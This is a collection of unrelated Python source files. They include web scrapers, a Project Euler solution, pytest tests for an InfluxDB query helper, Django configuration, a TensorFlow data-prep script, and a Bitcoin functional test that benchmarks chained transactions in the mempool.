        msg = f"Non-200 status code of {code} making GET request to: {url}"
        logger.critical(msg, exc_info=True)
    return r
def get_live_events(soup):
    """Return the live-event card divs from an organizer page, or [] when
    the page has no live_events section."""
    section = soup.find("article", {"id": "live_events"})
    try:
        return section.find_all("div", {"class": "list-card-v2"})
    except AttributeError:
        # section is None: no live events on this page.
        return []
def get_cost_events(soup):
    """Extract a digits-only cost string from an event card's label.

    'free' (and an empty label) map to '0'; otherwise all non-digit
    characters are stripped from the label text.
    """
    label = soup.find("span", {"class": "list-card__label"}).text.lower()
    digits = re.sub(r'[^\d]+', '', label.replace("free", "0"))
    return digits if digits else "0"
def main():
    """Scrape the organizer's live-events page and return a list of event
    dicts in the calendar-import format."""
    events_array = []
    # 14506382808 — Eventbrite organizer id (presumably Sierra Club MD;
    # confirm against the organizer page).
    r = get(14506382808, 'o')
    soup = BeautifulSoup(r.content, 'html.parser')
    event_a_refs = get_live_events(soup)
    for events in event_a_refs:
        event_cost = get_cost_events(events)
        # The card anchor's data-eid attribute holds the API event id.
        event_id = events.find("a").get("data-eid")
        events_array.append(scrape(event_id, event_cost))
    return events_array


if __name__ == '__main__':
    logging.basicConfig(
        level=logging.INFO,
        format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
    )
    events = main()
    print(len(events))
9,214 | db20a77778392c84bab50f6d4002dd11b73967b9 | '''
Find the greatest product of five consecutive digits in the 1000-digit number.
73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450
'''
from time import time  # kept from the original file; currently unused

# The 1000-digit number from Project Euler problem 8, as one digit string.
s = (
    '73167176531330624919225119674426574742355349194934'
    '96983520312774506326239578318016984801869478851843'
    '85861560789112949495459501737958331952853208805511'
    '12540698747158523863050715693290963295227443043557'
    '66896648950445244523161731856403098711121722383113'
    '62229893423380308135336276614282806444486645238749'
    '30358907296290491560440772390713810515859307960866'
    '70172427121883998797908792274921901699720888093776'
    '65727333001053367881220235421809751254540594752243'
    '52584907711670556013604839586446706324415722155397'
    '53697817977846174064955149290862569321978468622482'
    '83972241375657056057490261407972968652414535100474'
    '82166370484403199890008895243450658541227588666881'
    '16427171479924442928230863465674813919123162824586'
    '17866458359124566529476545682848912883142607690042'
    '24219022671055626321111109370544217506941658960408'
    '07198403850962455444362981230987879927244284909188'
    '84580156166097919133875499200524063689912560717606'
    '05886116467109405077541002256983155200055935729725'
    '71636269561882670428252483600823257530420752963450'
)


def greatest_run_product(digits, length=5):
    """Return the largest product of `length` consecutive digits in `digits`.

    Replaces the original hand-rolled loop, which had two bugs:
      * `continue` after `i += 5` only continued the inner product loop, so
        `i` could be bumped by 5 several times for one zero-containing
        window, silently skipping windows that were never examined;
      * `elif p > n: n = p` recorded partial products of fewer than
        `length` digits as candidates.
    Either bug could produce a wrong maximum.
    """
    best = 0
    for start in range(len(digits) - length + 1):
        product = 1
        for ch in digits[start:start + length]:
            product *= int(ch)
        if product > best:
            best = product
    return best


print(greatest_run_product(s))
|
9,215 | a1ce43c3f64667619c4964bc4dc67215d3ecc1a0 | # -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from meizi.items import MeiziItem
class MztspiderSpider(CrawlSpider):
    """Crawl meizitu.com gallery list pages and yield image-URL items.

    Walks list pages list_1_1.html .. list_1_91.html, follows article links
    found inside the list cards, and hands each gallery's image URLs to the
    images pipeline via MeiziItem.
    """
    name = 'mztspider2'
    allowed_domains = ['meizitu.com']
    start_urls = ['http://www.meizitu.com/a/list_1_%s.html' % urlnum for urlnum in range(1, 92)]
    rules = (
        # Only follow article links inside the list cards (restrict_xpaths).
        Rule(LinkExtractor(allow='meizitu.com/a', restrict_xpaths='//ul[@class="wp-list clearfix"]/li/div/div/a'),
             callback='parse_item', follow=True),
    )

    def parse_item(self, response):
        """Collect every gallery image src on the article page into one item."""
        sel = Selector(response)
        srcs = sel.xpath('//div[@id="picture"]/p/img/@src').extract()
        item = MeiziItem()
        # 'image_urls' is the conventional field consumed by ImagesPipeline.
        item['image_urls'] = srcs
        yield item
|
array_length = int(input())  # declared length (NOTE(review): never used below)
source = [int(x) for x in input().split()]


def find_neighbors():
    """Print, for each element of `source`, its distance to the nearest zero.

    Builds `result` as the running count of steps since the previous zero,
    then, whenever a new zero is seen, mirrors the nearer half of the run
    between the two zeros so each position holds the smaller distance.
    Assumes `source` contains at least one zero; with no zeros the printed
    values are just 1..n.
    """
    previous_zero_index = -1
    count = 0
    result = []
    for index, value in enumerate(source):
        count += 1
        if value == 0:
            if index == 0:
                previous_zero_index = 0
                count = 0
                result.append(0)
                continue
            if previous_zero_index == -1:
                # First zero seen: everything before it counts down toward it.
                result[0: index] = reversed(result[0:index])
                previous_zero_index = index
                count = 0
                result.append(0)
                continue
            result.append(0)
            # Between two zeros: overwrite the second half of the run with the
            # mirrored first half, so both halves hold min-distances.
            diff = (index - previous_zero_index) // 2
            result[index - diff: index] = reversed(result[previous_zero_index + 1: previous_zero_index + 1 + diff])
            previous_zero_index = index
            count = 0
            continue
        result.append(count)
    # After the last zero the ascending counts are already correct.
    for i in result:
        print(i, end=" ")


find_neighbors()
9,217 | 8aa9ba145b6c7347a7a926d50dca35383ddd52a3 | import unittest.mock
import assist
import pytest
def test_simple_query():
    """A flat SELECT with WHERE and GROUP BY yields a non-empty frame."""
    query = assist.build_query(
        select='time, value',
        from_='system_load',
        where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
        groupby=('host', 'L3'),
    )
    frame = assist.run_query(query, cache=False)
    assert not frame.empty
def test_nested_query():
    """An inner query can serve as the FROM clause of an outer one."""
    inner = assist.build_query(
        select='time, value, host, L3',
        from_='system_load',
        where='L2=\'cpuload\' and "name" != \'Idle\'',
    )
    outer = assist.build_query(
        select='time, value',
        from_=inner,
        where='time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\'',
        groupby=('host', 'L3'),
    )
    frame = assist.run_query(outer, cache=False)
    assert not frame.empty
def test_nested_query_with_datetime():
    """assist.Datetime objects can be interpolated into WHERE clauses."""
    inner = assist.build_query(
        select='time, value',
        from_='system_load',
        where='L2=\'cpuload\' and "name" != \'Idle\'',
        groupby=('host', 'L3'),
    )
    # NOTE(review): no space before 'and' — this relies on assist.Datetime's
    # str() ending in a delimiter; confirm the rendered clause is valid.
    outer = assist.build_query(
        select='time, value',
        from_=inner,
        where=f'time > {assist.Datetime(year=2021, month=6, day=16)}'
              f'and time < {assist.Datetime(year=2021, month=6, day=17)}',
    )
    frame = assist.run_query(outer, cache=False)
    assert not frame.empty
def test_warning():
    """Re-wrapping an already-grouped query emits a RuntimeWarning."""
    inner = assist.build_query(
        select='time, value',
        from_='system_load',
        where=f'time > {assist.Datetime(year=2021, month=6, day=16)}'
              f'and time < {assist.Datetime(year=2021, month=6, day=17)}'
              'and L2=\'cpuload\' and "name" != \'Idle\'',
        groupby=('host', 'L3'),
    )
    with pytest.warns(RuntimeWarning):
        outer = assist.build_query(select='time, value', from_=inner)
    frame = assist.run_query(outer, cache=False)
    assert not frame.empty
def test_time_grouping():
    """GROUP BY time(10m) together with an aggregate works."""
    query = assist.build_query(
        select='time, MAX(value)',
        from_='system_load',
        where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
        groupby=('time(10m)', 'host', 'L3'),
    )
    frame = assist.run_query(query, cache=False)
    assert not frame.empty
def test_fill_values():
    """fill(0) in the GROUP BY clause is accepted alongside time buckets."""
    query = assist.build_query(
        select='time, MEAN(value)',
        from_='system_load',
        where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
        groupby=('time(10m)', 'fill(0)', 'host', 'L3'),
    )
    frame = assist.run_query(query, cache=False)
    assert not frame.empty
def test_cached_query():
    """A cached result is served even after the InfluxDB client disappears."""
    query = assist.build_query(
        select='time, value',
        from_='system_load',
        where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
        groupby=('host', 'L3'),
    )

    def _execute(q):
        return assist.run_query(q, cache=True)

    _execute(query)  # warm the cache
    # Invalidate the InfluxDB client; the cached frame must still come back.
    frame = unittest.mock.patch('assist.parse.client', new=None)(_execute)(query)
    assert not frame.empty
def test_nocached_query():
    """Without caching, a missing client must make the query fail."""
    query = assist.build_query(
        select='time, value',
        from_='system_load',
        where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
        groupby=('host', 'L3'),
    )

    @unittest.mock.patch('assist.parse.client', new=None)
    def _execute(q):
        return assist.run_query(q, cache=False)

    # Invalidated client with no cache to fall back on: must raise.
    with pytest.raises(AttributeError):
        _execute(query)
def test_cached_query_mv():
    """Multivariate variant: cached results survive a missing client."""
    query = assist.build_query(
        select='time, value',
        from_='system_load',
        where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
        groupby=('host', 'L3'),
    )

    def _execute(q):
        return assist.run_multivariate_query(q, cache=True)

    _execute(query)  # warm the cache
    # Invalidate the InfluxDB client; the cached frame must still come back.
    frame = unittest.mock.patch('assist.parse.client', new=None)(_execute)(query)
    assert not frame.empty
def test_nocached_query_mv():
    """Multivariate variant: no cache plus an unusable client must fail."""
    query = assist.build_query(
        select='time, value',
        from_='system_load',
        where='L2=\'cpuload\' and time > \'2021-06-16 00:00:00\' and time < \'2021-06-17 00:00:00\' and "name" != \'Idle\'',
        groupby=('host', 'L3'),
    )

    # NOTE(review): the sibling test patches with None; list() here is an
    # inconsistency, but either object lacks the client API and so raises.
    @unittest.mock.patch('assist.parse.client', new=list())
    def _execute(q):
        return assist.run_multivariate_query(q, cache=False)

    with pytest.raises(AttributeError):
        _execute(query)
9,218 | fbbadb5cbd2b324686fc5faa0b1bc6236fc8d87b | import json
import math
import pandas as pd
import datetime
# Parse a BBOS order log into a DataFrame sorted by symbol and time.
record_file = r"D:\Doc\data\BBOS.log"  # hard-coded Windows path; adjust per machine

all_records = []
with open(record_file, "r") as f:
    all_line = f.readlines()
for line in all_line:
    # Each line looks like "[<epoch-millis>] ... {json payload}".
    record_time = line[line.index("[") + 1: line.index("]")]
    record_order = json.loads(line[line.index("{"):])
    for item in record_order["data"]["otherPositionRetList"]:
        # Millisecond epoch -> 'YYYY-mm-dd HH:MM:SS' (local timezone).
        item["time"] = datetime.datetime.fromtimestamp(math.floor(float(record_time)/1000)).strftime(r"%Y-%m-%d %H:%M:%S")
        all_records.append(item)

record_frame = pd.DataFrame(all_records)
print(record_frame.columns)
print(record_frame.sort_values(by=['symbol', 'time'] , ascending=[1,1]))
a = 'Hello, World!'
# Fix: the original bare `print` (a Python-2 statement form / a no-op
# expression in Python 3) never printed the value; print it explicitly.
print(a)
9,220 | d4b1b6bdf125f2791c219b7db579c234eda0a73c | import datetime
import calendar
import re
def cardinal(ordinal):
    """Convert an ordinal string like '1st' or '3rd' to its integer value."""
    digits = filter(str.isdigit, ordinal)
    return int(''.join(digits))
def meetup_day(year, month, day_of_week, ordinal):
    """Return the datetime.date of the requested meetup day.

    Parameters:
        year, month: calendar month to search.
        day_of_week: English weekday name, e.g. 'Monday'.
        ordinal: '1st'..'5th', 'last', or 'teenth' (the matching day in
            the 13th-19th).

    Fix vs. the original: the 'teenth' test used `10 < x < 20`, which also
    admits the 11th and 12th and returned the right answer only because a
    later match overwrote an earlier one; the bound is now the correct
    13..19 (which contains exactly one of each weekday).
    """
    weekday_names = ('Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',
                     'Saturday', 'Sunday')
    target = weekday_names.index(day_of_week)
    days_in_month = calendar.monthrange(year, month)[1]
    # All days of this month that fall on the requested weekday.
    possible_days = [d for d in range(1, days_in_month + 1)
                     if datetime.date(year, month, d).weekday() == target]
    if ordinal == 'teenth':
        day_of_month = next(d for d in possible_days if 13 <= d <= 19)
    elif ordinal == 'last':
        day_of_month = possible_days[-1]
    else:
        day_of_month = possible_days[cardinal(ordinal) - 1]
    return datetime.date(year, month, day_of_month)
|
9,221 | 55030648a6b76636e456990c1d2b02baa35a695d | from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
print('tensorflow version: {}'.format(tf.__version__))
def __prepare_train_data(df, feature):
    """Group `df` by (event, start) and build LSTM-ready arrays.

    Returns (data, labels): `data` stacks each group's `feature` column
    reshaped to (history_size, 1); `labels` are the numeric class ids of
    the group's event name (via convert_labels).

    Bug fixed: the original ignored the `feature` parameter and hard-coded
    'CylinderBorePressure'; the sole caller passes exactly that value, so
    behavior there is unchanged.
    """
    groups = df.groupby(['event', 'start'])
    data = []
    labels = []
    for group_id, group in groups:
        values = group[feature].values
        # Reshape data from (history_size,) to (history_size, 1)
        data.append(np.reshape(values, (len(values), 1)))
        labels.append(group_id[0])
    return np.array(data), np.array(convert_labels(labels))
def convert_labels(labels):
    """Map event names to float class ids: cut->0.0, sort->1.0, idle->2.0.

    Labels outside the three known event types are silently dropped,
    exactly as in the original if/elif chain.
    """
    mapping = {'cut': 0.0, 'sort': 1.0, 'idle': 2.0}
    return [mapping[label] for label in labels if label in mapping]
# Hyper-parameters (TRAIN_SPLIT is currently unused below).
TRAIN_SPLIT = 300000
BATCH_SIZE = 256
BUFFER_SIZE = 10000

tf.random.set_seed(13)  # reproducible shuffling/initialisation

# Load the sensor CSV, time-order it, and keep only the labelled event types.
train_df = pd.read_csv('data/st-cloud.csv')
train_df = train_df.sort_values(by=['timestamp'])
train_df = train_df.loc[(train_df['event'] == 'cut') | (train_df['event'] == 'sort') | (train_df['event'] == 'idle')]

x_train_uni, y_train_uni = __prepare_train_data(train_df, feature='CylinderBorePressure')
print(x_train_uni[0])
print(y_train_uni[0])

train_univariate = tf.data.Dataset.from_tensor_slices((x_train_uni, y_train_uni))

# --- LSTM training pipeline kept for reference (currently disabled) ---
# train_univariate = train_univariate.cache().shuffle(BUFFER_SIZE).batch(BATCH_SIZE).repeat()
#
# val_univariate = tf.data.Dataset.from_tensor_slices((x_val_uni, y_val_uni))
# val_univariate = val_univariate.batch(BATCH_SIZE).repeat()
#
# simple_lstm_model = tf.keras.models.Sequential([
#     tf.keras.layers.LSTM(8, input_shape=x_train_uni.shape[-2:]),
#     tf.keras.layers.Dense(1)
# ])
#
# simple_lstm_model.compile(optimizer='adam', loss='mae')
#
# for x, y in val_univariate.take(1):
#     print(simple_lstm_model.predict(x).shape)
#
# EVALUATION_INTERVAL = 200
# EPOCHS = 10
#
# simple_lstm_model.fit(train_univariate, epochs=EPOCHS,
#                       steps_per_epoch=EVALUATION_INTERVAL,
#                       validation_data=val_univariate, validation_steps=50)
# for x, y in val_univariate.take(3):
#     plot = show_plot([x[0].numpy(), y[0].numpy(),
#                       simple_lstm_model.predict(x)[0]], 0, 'Simple LSTM model')
#     plot.show()
|
9,222 | b3b5f7eeb81e10a51eb0322bc5278d33ee5f8e97 | """updateimage URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from updateapp.views import jsonre_data,jsonView,JsonView2,SerializeView,Serializeall
from updateapp.api import views,urls
from django.conf.urls import url,include
# URL table for the update app.
# Fix: the identical 'serialize/' route was listed twice; Django dispatches
# to the first match, so the duplicate entry was dead and has been removed.
urlpatterns = [
    url(r'^$', jsonre_data),
    url(r'^serialize/$', SerializeView.as_view()),
    url(r'^all/$', Serializeall.as_view()),
    url(r'^cbv1/$', jsonView.as_view()),
    url(r'^cbv2/$', JsonView2.as_view()),
    url(r'^api/updates/', include('updateapp.api.urls')),
    path('admin/', admin.site.urls),
]
|
9,223 | 58b12418a2a6b1ef9b63800b89e7f0b9fffd908c | # Generated by Django 2.2.1 on 2019-06-01 09:56
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the Participant table.

    NOTE(review): the four timestamp columns default to the float value
    1559382976.184129 — the wall-clock time when `makemigrations` ran —
    frozen into a BigIntegerField. The model presumably intended a
    "now" default; confirm before relying on these values. Generated
    migrations normally should not be hand-edited.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Participant',
            fields=[
                ('username', models.CharField(max_length=25, primary_key=True, serialize=False)),
                ('phone_num', models.CharField(default='', max_length=16)),
                ('password', models.CharField(max_length=16)),
                ('register_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),
                ('last_login_datetime', models.BigIntegerField(blank=True, default=1559382976.184129)),
                ('heartbeat_smartwatch', models.BigIntegerField(blank=True, default=1559382976.184129)),
                ('heartbeat_smartphone', models.BigIntegerField(blank=True, default=1559382976.184129)),
            ],
        ),
    ]
|
9,224 | 276bcb2e90c30f87c618106e5e862f00d082da34 |
from bs4 import BeautifulSoup
import urllib2
import datetime
import re
import csv
import sys
import time
import bb_load as bb_l
import pandas as pd
import requests
#Scrape the web for new buybacks
def scrape_buybacks():
    '''
    (NoneType) -> scraped_database.csv, database=open('scrape_database.csv', 'r')
    Version 3.0, MSP @ 11:00 04.06.16

    Scrape the five buyback-announcement pages from rttnews.com, normalize
    each row to (ISO date, ticker, amount in $M), drop rows already present
    in scrape_database.csv, append the rest to that file and re-sort it.
    Python 2 only (print statements, raw_input).
    '''
    # Define some of the variables used
    start_time = time.time()
    stock_list = []
    date_list = []
    bb_list = []
    not_added = int(0)
    full_switch = 'y'
    # Load reference database by external function; fall back to an empty
    # reference set when no prior database file exists.
    try:
        existing_database = read_existing_scrapefile()
        print ('Comparing existing database to new buybacks.')
        first = existing_database[0]
        first_date = first[0:first.find(',')]
        full_switch = raw_input('Do a full search beyond the most recent date '\
            +'in database? y/n: ')
    except (IOError, Warning):
        print 'Warning: No prior database available.', '\n' \
            'No reference check will be conducted; proceed with a new database file.', '\n'
        existing_database = []
        first_date = 0
    # Run a for loop to scrape all 5 pages of data
    for numb in ('1', '2', '3', '4', '5'):
        url = ("http://www.rttnews.com/CorpInfo/StockBuybacks.aspx?PageNum=" + numb)
        try:  # Scrape the page
            soup = BeautifulSoup(requests.get(url).content, "html.parser")
        except (Warning, IOError):  # Inform of any problems
            print 'Failed to scrape page number ' + numb + '.' + '\n' \
                'The remote host could have terminated the connection.' + '\n' \
                'Scraping terminated; try to run the program again.'
            sys.exit(0)
        end_search = False
        # Scrape the relevant info for all announcements in ODD rows
        for item in soup.select(".ecoCalContent"):
            count = 0
            # Scrape the relevant info for an individual announcement;
            # columns 1 (date), 2 (ticker) and 4 (amount) are the ones used.
            for numb in ["1","2","3","4","5","6"]:
                string = ".tblContent" + numb
                count = count + 1
                # Pull the text between the opening tag's '">' and '</'.
                start = int(str(item.select(string)).find('">') + 2)
                stop = int(str(item.select(string)).find('</'))
                extract = str(item.select(string))[start:stop]
                if count == 1:
                    # Column 1: announcement date given as m/d/yy -> ISO date.
                    date = extract
                    y = int(date[date.rfind("/")+1:len(date)])+2000
                    try:
                        d = int(date[date.find("/")+1:len(date)-date.find("/")-2])
                    except ValueError:
                        d = 1  # day missing/unparsable: default to the 1st
                    m = int(date[0:date.find("/")])
                    date = datetime.datetime(y,m,d).strftime("%Y-%m-%d")
                if count == 2:
                    # Column 2: company cell; reduce it to the bare ticker.
                    ticker = extract[extract.find(">")+1:len(extract)]
                    if ticker.find(",") > 0:
                        while ticker.count(",") > 1: # strip until only one comma left
                            ticker = ticker[ticker.find(",")+1:len(ticker)] # Strip before first comma
                        ticker = ticker[0:ticker.find(",")] # Strip after second comma
                    if ticker.find(".") > 0:
                        ticker = ticker[0:ticker.find(".")]
                    ticker = filter(str.isupper, ticker)
                if count == 4:
                    # Column 4: buyback amount; normalize to millions of dollars.
                    buyback = extract
                    unit = buyback.join(re.findall("[a-zA-Z]+", buyback))
                    val = re.findall(r"[-+]?\d*\.\d+|\d+", buyback)
                    val = float(val[0])
                    if unit == "":
                        val = val / 1000000
                    elif unit == "K":
                        val = val / 1000
                    elif unit == "Bln":
                        val = val * 1000
            date_list.append(date)
            stock_list.append(ticker)
            bb_list.append(val)
            # Build the aggregated list and removing buybacks
            # already in the existing buyback database
            teststr = str(date)+','+str(ticker)+','+str(val)
            if teststr in existing_database:
                date_list.pop()
                stock_list.pop()
                bb_list.pop()
                not_added = not_added + 1
        # Scrape the relevant info for all announcements in EVEN rows
        # (same logic as the ODD-row loop above, different CSS class).
        for item in soup.select(".ecoCalAltContent"):
            count = 0
            # Scrape the relevant info for an individual announcement
            for numb in ["1","2","3","4","5","6"]:
                string = ".tblContent" + numb
                count = count + 1
                start = int(str(item.select(string)).find('">') + 2)
                stop = int(str(item.select(string)).find('</'))
                extract = str(item.select(string))[start:stop]
                if count == 1:
                    date = extract
                    y = int(date[date.rfind("/")+1:len(date)])+2000
                    try:
                        d = int(date[date.find("/")+1:len(date)-date.find("/")-2])
                    except ValueError:
                        d = 1
                    m = int(date[0:date.find("/")])
                    date = datetime.datetime(y,m,d).strftime("%Y-%m-%d")
                if count == 2:
                    ticker = extract[extract.find(">")+1:len(extract)]
                    if ticker.find(",") > 0:
                        while ticker.count(",") > 1: # strip until only one comma left
                            ticker = ticker[ticker.find(",")+1:len(ticker)] # Strip before first comma
                        ticker = ticker[0:ticker.find(",")] # Strip after second comma
                    if ticker.find(".") > 0:
                        ticker = ticker[0:ticker.find(".")]
                    ticker = filter(str.isupper, ticker)
                if count == 4:
                    buyback = extract
                    unit = buyback.join(re.findall("[a-zA-Z]+", buyback))
                    val = re.findall(r"[-+]?\d*\.\d+|\d+", buyback)
                    val = float(val[0])
                    if unit == "":
                        val = val / 1000000
                    elif unit == "K":
                        val = val / 1000
                    elif unit == "Bln":
                        val = val * 1000
            date_list.append(date)
            stock_list.append(ticker)
            bb_list.append(val)
            # Build the aggregated list and removing buybacks
            # already in the existing buyback database
            teststr = str(date)+','+str(ticker)+','+str(val)
            if teststr in existing_database:
                date_list.pop()
                stock_list.pop()
                bb_list.pop()
                not_added = not_added + 1
    # Make a master list and append the surviving rows to the CSV database.
    master = [date_list, stock_list, bb_list]
    with open('scrape_database.csv', 'ab') as scrapefile:
        file_writer = csv.writer(scrapefile)
        for i in range(len(master[0])):
            file_writer.writerow([x[i] for x in master])
    sort_existing_scrapefile()
    # Print a short run summary.
    print '\n', '---------------------------------------------------------'
    print 'MODULE: NEW SHARE BUYBACKS FROM STOCKMAVEN.COM.'
    print 'Output: ' + str(len(date_list)) + \
        ' buyback(s) added to scrape_database.csv.'
    print ' ' + str(not_added) + ' buyback(s) scraped but not added to database'
    print 'Run-time:', "%.2f" %(time.time() - start_time), 'sec'
    print '---------------------------------------------------------' + '\n'
#Read the existing scrapefile into a list for comparison
def read_existing_scrapefile():
    """Load the existing buyback database into memory.

    Returns a list with one string per line of ``scrape_database.csv``
    (each line holds ``date,ticker,amount``).  Reading stops at the first
    empty line, matching the original sentinel-based loop.

    Precondition: ``scrape_database.csv`` exists in the working directory.
    """
    records = []
    with open('scrape_database.csv', 'r') as scrape_database:
        while True:
            row = scrape_database.readline().strip('\n')
            if row == '':
                break
            records.append(str(row))
    return records
# Sort the existing scrapefile by descending dates
def sort_existing_scrapefile():
    '''
    Version update: MSP @ 00:12 29.04.14
    ( ) -> ( )
    Sort the buyback database (scrape_database.csv) by descending dates.
    '''
    # Load the database as a DataFrame via the helper module, transpose so
    # rows are buybacks, and sort newest-first.
    # NOTE(review): DataFrame.sort() was removed in pandas 0.20 -- this only
    # works on old pandas; modern code would use sort_values('Date', ...).
    c = bb_l.load_buyback_df(-1,-1).T.sort('Date',ascending=False)
    d = c.index.tolist()          # tickers currently live in the index
    c['Ticker'] = d               # move them into an explicit column
    e = c['Date'].tolist()
    f = c[['Ticker','Amount']]
    f.index = e                   # re-index by date so to_csv writes date first
    f.to_csv('scrape_database.csv', header=False)
|
9,225 | 661eef8500309191514fd760b7518014dee2bb5f | #!/usr/bin/env python3
# Copyright (c) 2018 Nobody
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test perforance of descendant package (chained transactions)"""
import time
import copy
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.mininode import COIN
from test_framework.blocktools import *
"""Read optional arguments from command line"""
CHAINED_TX = 25
if len(sys.argv)>1:
CHAINED_TX = int(sys.argv[1])
TEST_ITERATIONS = 1
if len(sys.argv)>2:
TEST_ITERATIONS = int(sys.argv[2])
DEBUG_MODE = '-printtoconsole'
MAX_ANCESTORS = CHAINED_TX
MAX_DESCENDANTS = CHAINED_TX
MAGNETIC_ANOMALY_START_TIME = 2000000000
class ChainedTest(BitcoinTestFramework):
    """Benchmark mempool acceptance and getblocktemplate with a long tx chain."""

    def set_test_params(self):
        ''' our test network requires a peer node so that getblocktemplate succeeds '''
        self.num_nodes = 2
        # Raise ancestor/descendant package limits well above CHAINED_TX so
        # the whole chain is accepted into the mempool.
        chained_args = ["-limitancestorcount=2000", "-limitdescendantcount=2000",
                        "-limitancestorsize=1000", "-limitdescendantsize=1000",
                        "-magneticanomalyactivationtime=%d" % MAGNETIC_ANOMALY_START_TIME
                        ]
        config_node2 = chained_args.copy()
        if DEBUG_MODE:
            chained_args.append(DEBUG_MODE)   # console logging only on node 0
        self.extra_args = [chained_args, config_node2]

    # Build a transaction that spends parent_txid:vout
    # Return amount sent
    def chain_transaction(self, node, parent_txid, vout, value, fee, num_outputs):
        """Spend parent_txid:vout into num_outputs equal outputs.

        Returns (new txid, value per output, seconds spent inside
        sendrawtransaction, serialized tx size).
        """
        send_value = satoshi_round((value - fee) / num_outputs)
        inputs = [{'txid': parent_txid, 'vout': vout}]
        outputs = {}
        for i in range(num_outputs):
            outputs[node.getnewaddress()] = send_value
        rawtx = node.createrawtransaction(inputs, outputs)
        signedtx = node.signrawtransaction(rawtx)
        # measure the performance of sending the raw transaction to the node
        sendtx_start = time.perf_counter()
        new_txid = node.sendrawtransaction(signedtx['hex'])
        sendtx_stop = time.perf_counter()
        fulltx = node.getrawtransaction(new_txid, 1)
        #self.log.info('{0} => {1}'.format(parent_txid, fulltx['vout'][0]))
        # make sure we didn't generate a change output
        assert(len(fulltx['vout']) == num_outputs)
        return (new_txid, send_value, sendtx_stop - sendtx_start, fulltx['size'])

    def mine_blocks(self):
        ''' Mine some blocks and have them mature. '''
        self.nodes[0].generate(101)
        self.utxo = self.nodes[0].listunspent(10)
        # Seed the chain from the first mature UTXO.
        self.txid = self.utxo[0]['txid']
        self.coinbasetx = self.txid
        self.vout = self.utxo[0]['vout']
        self.value = self.utxo[0]['amount']
        self.fee = Decimal("0.0001")
        self.tip = int("0x" + self.nodes[0].getbestblockhash(), 0)
        self.block_time = int(time.time()) + 1

    def send_chain_to_node(self):
        ''' Generates tx chain and send it to node '''
        for i in range(CHAINED_TX):
            (sent_txid, sent_value, this_sendtx, tx_size) = self.chain_transaction(
                self.nodes[0], self.txid, 0, self.value, self.fee, 1)
            if not self.chain_top:
                self.chain_top = sent_txid   # remember the first link of the chain
            self.txid = sent_txid            # each tx spends the previous one
            self.value = sent_value
            self.chain.append(sent_txid)
            self.mempool_send += this_sendtx # accumulate send time / bytes
            self.mempool_size += tx_size

    def create_new_block(self):
        ''' Create a new block with an anyone-can-spend coinbase '''
        block = create_block(
            self.tip, create_coinbase(self.height), self.block_time)
        self.block_time += 1
        block.solve()
        return block

    def mempool_count(self):
        ''' get count of tx in mempool '''
        mininginfo = self.nodes[0].getmininginfo()
        return mininginfo['pooledtx']

    def dumppool(self, mempool):
        ''' Show list of chained tx in mempool with parent(depends) '''
        # NOTE(review): sortdepends is defined but unused; the sorted() call
        # below uses an equivalent lambda key instead.
        def sortdepends(e):
            return e['descendantcount']
        sortedlist = [[k,v] for k,v in mempool.items()]
        sortedlist = sorted(sortedlist, key=lambda l: l[1]['descendantcount'], reverse=True)
        for memkv in sortedlist:
            memtx = memkv[1]
            self.log.info('{} {} {}'.format(memkv[0], memtx['descendantcount'], memtx['depends']))

    def run_test(self):
        """Build the chain, verify the mempool, then time getblocktemplate."""
        self.log.info('Starting Test with {0} Chained Transactions'.format(CHAINED_TX))
        self.chain_top = None
        self.mine_blocks()
        self.mempool_send = 0
        self.mempool_size = 0
        self.chain = []
        self.send_chain_to_node()
        # mempool should have all our tx
        assert(self.mempool_count() == CHAINED_TX)
        mempool = self.nodes[0].getrawmempool(True)
        self.log.info('tx at top has {} descendants'.format(mempool[self.chain_top]["descendantcount"]))
        assert(mempool[self.chain_top]["descendantcount"] == CHAINED_TX)
